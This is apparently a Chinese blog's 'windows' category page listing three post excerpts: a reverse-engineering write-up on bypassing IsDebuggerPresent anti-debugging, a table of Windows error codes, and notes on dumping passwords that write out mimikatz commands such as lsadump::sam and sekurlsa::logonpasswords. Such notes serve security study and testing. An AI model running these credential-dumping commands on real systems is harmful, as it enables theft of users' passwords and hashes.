随笔分类 -  windows

摘要:在某爱论坛上看到有个师傅写了个Crackme,关于如何绕过IsDebuggerPresent的反调试的,闲来无事复现调试一下 先上原文链接:https://www.52pojie.cn/thread-1432590-1-1.html 反调试 什么是反调试技术 反调试技术,顾名思义就是用来防止被调试的 阅读全文
posted @ 2021-05-28 22:19 Punished 阅读(336) 评论(0) 推荐(0)
摘要:[0] -操作成功完成。[1] -功能错误。[2] -系统找不到指定的文件。[3] -系统找不到指定的路径。[4] -系统无法打开文件。[5] -拒绝访问。[6] -句柄无效。[7] -存储控制块被损坏。[8] -存储空间不足,无法处理此命令。[9] -存储控制块地址无效。[10] -环境错误。[1 阅读全文
posted @ 2021-05-27 21:16 Punished 阅读(101) 评论(0) 推荐(0)
摘要:在线抓密码 1.mimikatz privilege::debug token::whoami token::elevate lsadump::sam mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" 2.ps脚本 使用Get-Pa 阅读全文
posted @ 2021-04-08 20:42 Punished 阅读(289) 评论(0) 推荐(0)